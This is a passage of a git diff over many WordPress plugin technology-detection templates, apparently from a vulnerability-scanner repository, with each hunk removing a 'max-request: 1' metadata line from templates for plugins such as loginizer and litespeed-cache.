https://wordpress.org/plugins/kadence-blocks/ metadata: - max-request: 1 plugin_namespace: kadence-blocks wpscan: https://wpscan.com/plugin/kadence-blocks tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/kirki.yaml b/http/technologies/wordpress/plugins/kirki.yaml index c286e9a14f..22687bcffe 100644 --- a/http/technologies/wordpress/plugins/kirki.yaml +++ b/http/technologies/wordpress/plugins/kirki.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/kirki/ metadata: - max-request: 1 plugin_namespace: kirki wpscan: https://wpscan.com/plugin/kirki tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/leadin.yaml b/http/technologies/wordpress/plugins/leadin.yaml index 364e3cd71e..b69d3d5bfe 100644 --- a/http/technologies/wordpress/plugins/leadin.yaml +++ b/http/technologies/wordpress/plugins/leadin.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/leadin/ metadata: - max-request: 1 plugin_namespace: leadin wpscan: https://wpscan.com/plugin/leadin tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/limit-login-attempts-reloaded.yaml b/http/technologies/wordpress/plugins/limit-login-attempts-reloaded.yaml index 4fcccbfc33..7975a57702 100644 --- a/http/technologies/wordpress/plugins/limit-login-attempts-reloaded.yaml +++ b/http/technologies/wordpress/plugins/limit-login-attempts-reloaded.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/limit-login-attempts-reloaded/ metadata: - max-request: 1 plugin_namespace: limit-login-attempts-reloaded wpscan: https://wpscan.com/plugin/limit-login-attempts-reloaded tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/limit-login-attempts.yaml b/http/technologies/wordpress/plugins/limit-login-attempts.yaml index 3fbc714d3b..ff4cef94d7 100644 --- a/http/technologies/wordpress/plugins/limit-login-attempts.yaml +++ b/http/technologies/wordpress/plugins/limit-login-attempts.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/limit-login-attempts/ metadata: - max-request: 1 plugin_namespace: limit-login-attempts wpscan: https://wpscan.com/plugin/limit-login-attempts tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/litespeed-cache.yaml b/http/technologies/wordpress/plugins/litespeed-cache.yaml index c49b506979..a8903697b0 100644 --- a/http/technologies/wordpress/plugins/litespeed-cache.yaml +++ b/http/technologies/wordpress/plugins/litespeed-cache.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/litespeed-cache/ metadata: - max-request: 1 plugin_namespace: litespeed-cache wpscan: https://wpscan.com/plugin/litespeed-cache tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/loco-translate.yaml b/http/technologies/wordpress/plugins/loco-translate.yaml index dfcaf6f71b..3f141c4476 100644 --- a/http/technologies/wordpress/plugins/loco-translate.yaml +++ b/http/technologies/wordpress/plugins/loco-translate.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/loco-translate/ metadata: - max-request: 1 plugin_namespace: loco-translate wpscan: https://wpscan.com/plugin/loco-translate tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/loginizer.yaml b/http/technologies/wordpress/plugins/loginizer.yaml index 61be246fee..5355e988a2 100644 --- a/http/technologies/wordpress/plugins/loginizer.yaml +++ b/http/technologies/wordpress/plugins/loginizer.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/loginizer/ metadata: - max-request: 1 plugin_namespace: loginizer wpscan: https://wpscan.com/plugin/loginizer tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/loginpress.yaml b/http/technologies/wordpress/plugins/loginpress.yaml index 1c16a72d76..6f06b49011 100644 --- a/http/technologies/wordpress/plugins/loginpress.yaml +++ b/http/technologies/wordpress/plugins/loginpress.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/loginpress/ metadata: - max-request: 1 plugin_namespace: loginpress wpscan: https://wpscan.com/plugin/loginpress tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/mailchimp-for-woocommerce.yaml b/http/technologies/wordpress/plugins/mailchimp-for-woocommerce.yaml index 50d2e6630b..53d409fb68 100644 --- a/http/technologies/wordpress/plugins/mailchimp-for-woocommerce.yaml +++ b/http/technologies/wordpress/plugins/mailchimp-for-woocommerce.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/mailchimp-for-woocommerce/ metadata: - max-request: 1 plugin_namespace: mailchimp-for-woocommerce wpscan: https://wpscan.com/plugin/mailchimp-for-woocommerce tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/mailchimp-for-wp.yaml b/http/technologies/wordpress/plugins/mailchimp-for-wp.yaml index 8d71f7bde9..0e908a9580 100644 --- a/http/technologies/wordpress/plugins/mailchimp-for-wp.yaml +++ b/http/technologies/wordpress/plugins/mailchimp-for-wp.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/mailchimp-for-wp/ metadata: - max-request: 1 plugin_namespace: mailchimp-for-wp wpscan: https://wpscan.com/plugin/mailchimp-for-wp tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/mailpoet.yaml b/http/technologies/wordpress/plugins/mailpoet.yaml index 5e1f97086e..aeb1875c57 100644 --- a/http/technologies/wordpress/plugins/mailpoet.yaml +++ b/http/technologies/wordpress/plugins/mailpoet.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/mailpoet/ metadata: - max-request: 1 plugin_namespace: mailpoet wpscan: https://wpscan.com/plugin/mailpoet tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/maintenance.yaml b/http/technologies/wordpress/plugins/maintenance.yaml index d87d456a8c..7c15702305 100644 --- a/http/technologies/wordpress/plugins/maintenance.yaml +++ b/http/technologies/wordpress/plugins/maintenance.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/maintenance/ metadata: - max-request: 1 plugin_namespace: maintenance wpscan: https://wpscan.com/plugin/maintenance tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/mainwp-child.yaml b/http/technologies/wordpress/plugins/mainwp-child.yaml index aa9153241e..5ce87e6c71 100644 --- a/http/technologies/wordpress/plugins/mainwp-child.yaml +++ b/http/technologies/wordpress/plugins/mainwp-child.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/mainwp-child/ metadata: - max-request: 1 plugin_namespace: mainwp-child wpscan: https://wpscan.com/plugin/mainwp-child tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/malcare-security.yaml b/http/technologies/wordpress/plugins/malcare-security.yaml index 09641796a3..c342e6b45a 100644 --- a/http/technologies/wordpress/plugins/malcare-security.yaml +++ b/http/technologies/wordpress/plugins/malcare-security.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/malcare-security/ metadata: - max-request: 1 plugin_namespace: malcare-security wpscan: https://wpscan.com/plugin/malcare-security tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/megamenu.yaml b/http/technologies/wordpress/plugins/megamenu.yaml index 28b70d09bf..e95041f555 100644 --- a/http/technologies/wordpress/plugins/megamenu.yaml +++ b/http/technologies/wordpress/plugins/megamenu.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/megamenu/ metadata: - max-request: 1 plugin_namespace: megamenu wpscan: https://wpscan.com/plugin/megamenu tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/members.yaml b/http/technologies/wordpress/plugins/members.yaml index b43c10ed7a..879a0d1c12 100644 --- a/http/technologies/wordpress/plugins/members.yaml +++ b/http/technologies/wordpress/plugins/members.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/members/ metadata: - max-request: 1 plugin_namespace: members wpscan: https://wpscan.com/plugin/members tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/meta-box.yaml b/http/technologies/wordpress/plugins/meta-box.yaml index eb7e78bc7f..985f5d373a 100644 --- a/http/technologies/wordpress/plugins/meta-box.yaml +++ b/http/technologies/wordpress/plugins/meta-box.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/meta-box/ metadata: - max-request: 1 plugin_namespace: meta-box wpscan: https://wpscan.com/plugin/meta-box tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/ml-slider.yaml b/http/technologies/wordpress/plugins/ml-slider.yaml index 3da2ea50e1..bbc305b8de 100644 --- a/http/technologies/wordpress/plugins/ml-slider.yaml +++ b/http/technologies/wordpress/plugins/ml-slider.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/ml-slider/ metadata: - max-request: 1 plugin_namespace: ml-slider wpscan: https://wpscan.com/plugin/ml-slider tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/newsletter.yaml b/http/technologies/wordpress/plugins/newsletter.yaml index 7a58c58f63..7e3e4e2d7e 100644 --- a/http/technologies/wordpress/plugins/newsletter.yaml +++ b/http/technologies/wordpress/plugins/newsletter.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/newsletter/ metadata: - max-request: 1 plugin_namespace: newsletter wpscan: https://wpscan.com/plugin/newsletter tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/nextend-facebook-connect.yaml b/http/technologies/wordpress/plugins/nextend-facebook-connect.yaml index 5f99b8cac8..17ea142c46 100644 --- a/http/technologies/wordpress/plugins/nextend-facebook-connect.yaml +++ b/http/technologies/wordpress/plugins/nextend-facebook-connect.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/nextend-facebook-connect/ metadata: - max-request: 1 plugin_namespace: nextend-facebook-connect wpscan: https://wpscan.com/plugin/nextend-facebook-connect tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/nextgen-gallery.yaml b/http/technologies/wordpress/plugins/nextgen-gallery.yaml index b08876df04..953e4ab3d8 100644 --- a/http/technologies/wordpress/plugins/nextgen-gallery.yaml +++ b/http/technologies/wordpress/plugins/nextgen-gallery.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/nextgen-gallery/ metadata: - max-request: 1 plugin_namespace: nextgen-gallery wpscan: https://wpscan.com/plugin/nextgen-gallery tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/ninja-forms.yaml b/http/technologies/wordpress/plugins/ninja-forms.yaml index 3f68dffe06..92107fa69c 100644 --- a/http/technologies/wordpress/plugins/ninja-forms.yaml +++ b/http/technologies/wordpress/plugins/ninja-forms.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/ninja-forms/ metadata: - max-request: 1 plugin_namespace: ninja-forms wpscan: https://wpscan.com/plugin/ninja-forms tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/ocean-extra.yaml b/http/technologies/wordpress/plugins/ocean-extra.yaml index 34f9bde1d6..5e1fe4ef5c 100644 --- a/http/technologies/wordpress/plugins/ocean-extra.yaml +++ b/http/technologies/wordpress/plugins/ocean-extra.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/ocean-extra/ metadata: - max-request: 1 plugin_namespace: ocean-extra wpscan: https://wpscan.com/plugin/ocean-extra tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/official-facebook-pixel.yaml b/http/technologies/wordpress/plugins/official-facebook-pixel.yaml index d9f645328f..74fb3e6010 100644 --- a/http/technologies/wordpress/plugins/official-facebook-pixel.yaml +++ b/http/technologies/wordpress/plugins/official-facebook-pixel.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/official-facebook-pixel/ metadata: - max-request: 1 plugin_namespace: official-facebook-pixel wpscan: https://wpscan.com/plugin/official-facebook-pixel tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/one-click-demo-import.yaml b/http/technologies/wordpress/plugins/one-click-demo-import.yaml index 8a1196fc9f..b9f70ba555 100644 --- a/http/technologies/wordpress/plugins/one-click-demo-import.yaml +++ b/http/technologies/wordpress/plugins/one-click-demo-import.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/one-click-demo-import/ metadata: - max-request: 1 plugin_namespace: one-click-demo-import wpscan: https://wpscan.com/plugin/one-click-demo-import tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/optinmonster.yaml b/http/technologies/wordpress/plugins/optinmonster.yaml index 05025452b7..6486c02c9a 100644 --- a/http/technologies/wordpress/plugins/optinmonster.yaml +++ b/http/technologies/wordpress/plugins/optinmonster.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/optinmonster/ metadata: - max-request: 1 plugin_namespace: optinmonster wpscan: https://wpscan.com/plugin/optinmonster tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/otter-blocks.yaml b/http/technologies/wordpress/plugins/otter-blocks.yaml index 1db1b57708..81f58198d3 100644 --- a/http/technologies/wordpress/plugins/otter-blocks.yaml +++ b/http/technologies/wordpress/plugins/otter-blocks.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/otter-blocks/ metadata: - max-request: 1 plugin_namespace: otter-blocks wpscan: https://wpscan.com/plugin/otter-blocks tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/password-protected.yaml b/http/technologies/wordpress/plugins/password-protected.yaml index dafe6974f6..3743307dbc 100644 --- a/http/technologies/wordpress/plugins/password-protected.yaml +++ b/http/technologies/wordpress/plugins/password-protected.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/password-protected/ metadata: - max-request: 1 plugin_namespace: password-protected wpscan: https://wpscan.com/plugin/password-protected tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/pdf-embedder.yaml b/http/technologies/wordpress/plugins/pdf-embedder.yaml index ba05fb1e16..a4c6980041 100644 --- a/http/technologies/wordpress/plugins/pdf-embedder.yaml +++ b/http/technologies/wordpress/plugins/pdf-embedder.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/pdf-embedder/ metadata: - max-request: 1 plugin_namespace: pdf-embedder wpscan: https://wpscan.com/plugin/pdf-embedder tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/pinterest-for-woocommerce.yaml b/http/technologies/wordpress/plugins/pinterest-for-woocommerce.yaml index a038adac53..e085f30e5a 100644 --- a/http/technologies/wordpress/plugins/pinterest-for-woocommerce.yaml +++ b/http/technologies/wordpress/plugins/pinterest-for-woocommerce.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/pinterest-for-woocommerce/ metadata: - max-request: 1 plugin_namespace: pinterest-for-woocommerce wpscan: https://wpscan.com/plugin/pinterest-for-woocommerce tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/pixelyoursite.yaml b/http/technologies/wordpress/plugins/pixelyoursite.yaml index 7f98d822a8..adf3387ddb 100644 --- a/http/technologies/wordpress/plugins/pixelyoursite.yaml +++ b/http/technologies/wordpress/plugins/pixelyoursite.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/pixelyoursite/ metadata: - max-request: 1 plugin_namespace: pixelyoursite wpscan: https://wpscan.com/plugin/pixelyoursite tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/polylang.yaml b/http/technologies/wordpress/plugins/polylang.yaml index 89602f4264..eb6e1aaa5d 100644 --- a/http/technologies/wordpress/plugins/polylang.yaml +++ b/http/technologies/wordpress/plugins/polylang.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/polylang/ metadata: - max-request: 1 plugin_namespace: polylang wpscan: https://wpscan.com/plugin/polylang tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/popup-builder.yaml b/http/technologies/wordpress/plugins/popup-builder.yaml index 2f6513ca42..b3c83cd0bf 100644 --- a/http/technologies/wordpress/plugins/popup-builder.yaml +++ b/http/technologies/wordpress/plugins/popup-builder.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/popup-builder/ metadata: - max-request: 1 plugin_namespace: popup-builder wpscan: https://wpscan.com/plugin/popup-builder tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/popup-maker.yaml b/http/technologies/wordpress/plugins/popup-maker.yaml index 982306b13c..96d8bd6aca 100644 --- a/http/technologies/wordpress/plugins/popup-maker.yaml +++ b/http/technologies/wordpress/plugins/popup-maker.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/popup-maker/ metadata: - max-request: 1 plugin_namespace: popup-maker wpscan: https://wpscan.com/plugin/popup-maker tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/post-smtp.yaml b/http/technologies/wordpress/plugins/post-smtp.yaml index fdcac13b56..85955ac95e 100644 --- a/http/technologies/wordpress/plugins/post-smtp.yaml +++ b/http/technologies/wordpress/plugins/post-smtp.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/post-smtp/ metadata: - max-request: 1 plugin_namespace: post-smtp wpscan: https://wpscan.com/plugin/post-smtp tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/post-types-order.yaml b/http/technologies/wordpress/plugins/post-types-order.yaml index fc316f9f7a..a81fc892ca 100644 --- a/http/technologies/wordpress/plugins/post-types-order.yaml +++ b/http/technologies/wordpress/plugins/post-types-order.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/post-types-order/ metadata: - max-request: 1 plugin_namespace: post-types-order wpscan: https://wpscan.com/plugin/post-types-order tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/premium-addons-for-elementor.yaml b/http/technologies/wordpress/plugins/premium-addons-for-elementor.yaml index 975b63f5de..d9c6052cd7 100644 --- a/http/technologies/wordpress/plugins/premium-addons-for-elementor.yaml +++ b/http/technologies/wordpress/plugins/premium-addons-for-elementor.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/premium-addons-for-elementor/ metadata: - max-request: 1 plugin_namespace: premium-addons-for-elementor wpscan: https://wpscan.com/plugin/premium-addons-for-elementor tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/pretty-link.yaml b/http/technologies/wordpress/plugins/pretty-link.yaml index 5065659e82..afc1141e0c 100644 --- a/http/technologies/wordpress/plugins/pretty-link.yaml +++ b/http/technologies/wordpress/plugins/pretty-link.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/pretty-link/ metadata: - max-request: 1 plugin_namespace: pretty-link wpscan: https://wpscan.com/plugin/pretty-link tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/really-simple-captcha.yaml b/http/technologies/wordpress/plugins/really-simple-captcha.yaml index 732ffbc4eb..d44add9ca6 100644 --- a/http/technologies/wordpress/plugins/really-simple-captcha.yaml +++ b/http/technologies/wordpress/plugins/really-simple-captcha.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/really-simple-captcha/ metadata: - max-request: 1 plugin_namespace: really-simple-captcha wpscan: https://wpscan.com/plugin/really-simple-captcha tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/really-simple-ssl.yaml b/http/technologies/wordpress/plugins/really-simple-ssl.yaml index 12dffeb534..20ba5c2e16 100644 --- a/http/technologies/wordpress/plugins/really-simple-ssl.yaml +++ b/http/technologies/wordpress/plugins/really-simple-ssl.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/really-simple-ssl/ metadata: - max-request: 1 plugin_namespace: really-simple-ssl wpscan: https://wpscan.com/plugin/really-simple-ssl tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/redirection.yaml b/http/technologies/wordpress/plugins/redirection.yaml index ae0e76c4bb..cbcf3cf09d 100644 --- a/http/technologies/wordpress/plugins/redirection.yaml +++ b/http/technologies/wordpress/plugins/redirection.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/redirection/ metadata: - max-request: 1 plugin_namespace: redirection wpscan: https://wpscan.com/plugin/redirection tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/redux-framework.yaml b/http/technologies/wordpress/plugins/redux-framework.yaml index b1718d1ccb..3311d42c94 100644 --- a/http/technologies/wordpress/plugins/redux-framework.yaml +++ b/http/technologies/wordpress/plugins/redux-framework.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/redux-framework/ metadata: - max-request: 1 plugin_namespace: redux-framework wpscan: https://wpscan.com/plugin/redux-framework tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/regenerate-thumbnails.yaml b/http/technologies/wordpress/plugins/regenerate-thumbnails.yaml index 7543ac1d55..46c1c22805 100644 --- a/http/technologies/wordpress/plugins/regenerate-thumbnails.yaml +++ b/http/technologies/wordpress/plugins/regenerate-thumbnails.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/regenerate-thumbnails/ metadata: - max-request: 1 plugin_namespace: regenerate-thumbnails wpscan: https://wpscan.com/plugin/regenerate-thumbnails tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/safe-svg.yaml b/http/technologies/wordpress/plugins/safe-svg.yaml index 4a29cecdb0..7c13b8d2a4 100644 --- a/http/technologies/wordpress/plugins/safe-svg.yaml +++ b/http/technologies/wordpress/plugins/safe-svg.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/safe-svg/ metadata: - max-request: 1 plugin_namespace: safe-svg wpscan: https://wpscan.com/plugin/safe-svg tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/seo-by-rank-math.yaml b/http/technologies/wordpress/plugins/seo-by-rank-math.yaml index be281d91e6..53b30ba721 100644 --- a/http/technologies/wordpress/plugins/seo-by-rank-math.yaml +++ b/http/technologies/wordpress/plugins/seo-by-rank-math.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/seo-by-rank-math/ metadata: - max-request: 1 plugin_namespace: seo-by-rank-math wpscan: https://wpscan.com/plugin/seo-by-rank-math tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/sg-cachepress.yaml b/http/technologies/wordpress/plugins/sg-cachepress.yaml index 6bd95ec077..9555d7aebd 100644 --- a/http/technologies/wordpress/plugins/sg-cachepress.yaml +++ b/http/technologies/wordpress/plugins/sg-cachepress.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/sg-cachepress/ metadata: - max-request: 1 plugin_namespace: sg-cachepress wpscan: https://wpscan.com/plugin/sg-cachepress tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/sg-security.yaml b/http/technologies/wordpress/plugins/sg-security.yaml index 1fd64a5279..180266f448 100644 --- a/http/technologies/wordpress/plugins/sg-security.yaml +++ b/http/technologies/wordpress/plugins/sg-security.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/sg-security/ metadata: - max-request: 1 plugin_namespace: sg-security wpscan: https://wpscan.com/plugin/sg-security tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/shortcodes-ultimate.yaml b/http/technologies/wordpress/plugins/shortcodes-ultimate.yaml index 1bb9a283ce..17584cd064 100644 --- a/http/technologies/wordpress/plugins/shortcodes-ultimate.yaml +++ b/http/technologies/wordpress/plugins/shortcodes-ultimate.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/shortcodes-ultimate/ metadata: - max-request: 1 plugin_namespace: shortcodes-ultimate wpscan: https://wpscan.com/plugin/shortcodes-ultimate tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/shortpixel-image-optimiser.yaml b/http/technologies/wordpress/plugins/shortpixel-image-optimiser.yaml index 7836d9554c..015fb97043 100644 --- a/http/technologies/wordpress/plugins/shortpixel-image-optimiser.yaml +++ b/http/technologies/wordpress/plugins/shortpixel-image-optimiser.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/shortpixel-image-optimiser/ metadata: - max-request: 1 plugin_namespace: shortpixel-image-optimiser wpscan: https://wpscan.com/plugin/shortpixel-image-optimiser tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/simple-custom-post-order.yaml b/http/technologies/wordpress/plugins/simple-custom-post-order.yaml index ccd72e427a..1d5224b457 100644 --- a/http/technologies/wordpress/plugins/simple-custom-post-order.yaml +++ b/http/technologies/wordpress/plugins/simple-custom-post-order.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/simple-custom-post-order/ metadata: - max-request: 1 plugin_namespace: simple-custom-post-order wpscan: https://wpscan.com/plugin/simple-custom-post-order tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/siteguard.yaml b/http/technologies/wordpress/plugins/siteguard.yaml index 3622b2c6b3..aafd6c6a38 100644 --- a/http/technologies/wordpress/plugins/siteguard.yaml +++ b/http/technologies/wordpress/plugins/siteguard.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/siteguard/ metadata: - max-request: 1 plugin_namespace: siteguard wpscan: https://wpscan.com/plugin/siteguard tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/siteorigin-panels.yaml b/http/technologies/wordpress/plugins/siteorigin-panels.yaml index 9eff765d61..e10ab985da 100644 --- a/http/technologies/wordpress/plugins/siteorigin-panels.yaml +++ b/http/technologies/wordpress/plugins/siteorigin-panels.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/siteorigin-panels/ metadata: - max-request: 1 plugin_namespace: siteorigin-panels wpscan: https://wpscan.com/plugin/siteorigin-panels tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/smart-slider-3.yaml b/http/technologies/wordpress/plugins/smart-slider-3.yaml index c856e1fa9e..9881b591ae 100644 --- a/http/technologies/wordpress/plugins/smart-slider-3.yaml +++ b/http/technologies/wordpress/plugins/smart-slider-3.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/smart-slider-3/ metadata: - max-request: 1 plugin_namespace: smart-slider-3 wpscan: https://wpscan.com/plugin/smart-slider-3 tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/so-widgets-bundle.yaml b/http/technologies/wordpress/plugins/so-widgets-bundle.yaml index 008440cc58..0480b4b0e6 100644 --- a/http/technologies/wordpress/plugins/so-widgets-bundle.yaml +++ b/http/technologies/wordpress/plugins/so-widgets-bundle.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/so-widgets-bundle/ metadata: - max-request: 1 plugin_namespace: so-widgets-bundle wpscan: https://wpscan.com/plugin/so-widgets-bundle tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/stops-core-theme-and-plugin-updates.yaml b/http/technologies/wordpress/plugins/stops-core-theme-and-plugin-updates.yaml index 410776862f..26d525386b 100644 --- a/http/technologies/wordpress/plugins/stops-core-theme-and-plugin-updates.yaml +++ b/http/technologies/wordpress/plugins/stops-core-theme-and-plugin-updates.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/stops-core-theme-and-plugin-updates/ metadata: - max-request: 1 plugin_namespace: stops-core-theme-and-plugin-updates wpscan: https://wpscan.com/plugin/stops-core-theme-and-plugin-updates tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/sucuri-scanner.yaml b/http/technologies/wordpress/plugins/sucuri-scanner.yaml index f210a2a2f9..3920c5cf56 100644 --- a/http/technologies/wordpress/plugins/sucuri-scanner.yaml +++ b/http/technologies/wordpress/plugins/sucuri-scanner.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/sucuri-scanner/ metadata: - max-request: 1 plugin_namespace: sucuri-scanner wpscan: https://wpscan.com/plugin/sucuri-scanner tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/svg-support.yaml b/http/technologies/wordpress/plugins/svg-support.yaml index f1dd1bf150..f556786f5a 100644 --- a/http/technologies/wordpress/plugins/svg-support.yaml +++ b/http/technologies/wordpress/plugins/svg-support.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/svg-support/ metadata: - max-request: 1 plugin_namespace: svg-support wpscan: https://wpscan.com/plugin/svg-support tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/table-of-contents-plus.yaml b/http/technologies/wordpress/plugins/table-of-contents-plus.yaml index a9ec913599..844e3d19a0 100644 --- a/http/technologies/wordpress/plugins/table-of-contents-plus.yaml +++ 